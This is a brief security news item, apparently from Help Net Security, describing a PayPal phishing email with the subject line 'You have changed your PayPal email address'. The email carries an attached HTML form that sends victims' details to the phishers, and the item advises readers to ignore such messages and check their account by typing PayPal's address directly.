With "You have changed your PayPal email address" in the subject line, the sender attempts to convince the recipients that someone has accessed their account and changed the email address associated with it. To "keep the original email and restore their PayPal account", the users are required to fill out the attached Personal Profile Form - PayPal-.htm form.
Unfortunately for those who fall for this scam, the submitted information gets sent directly to the phishers, points out Sophos.
As always, users are advise to ignore emails such as these - or better yet, forward them to the company's security team - and to check if anything is amiss by going to PayPal's legitimate site by typing in its URL directly into their browsers.
By subscribing to our early morning news update, you will receive a daily digest of the latest security news published on Help Net Security.
With over 500 issues so far, reading our newsletter every Monday morning will keep you up-to-date with security risks out there.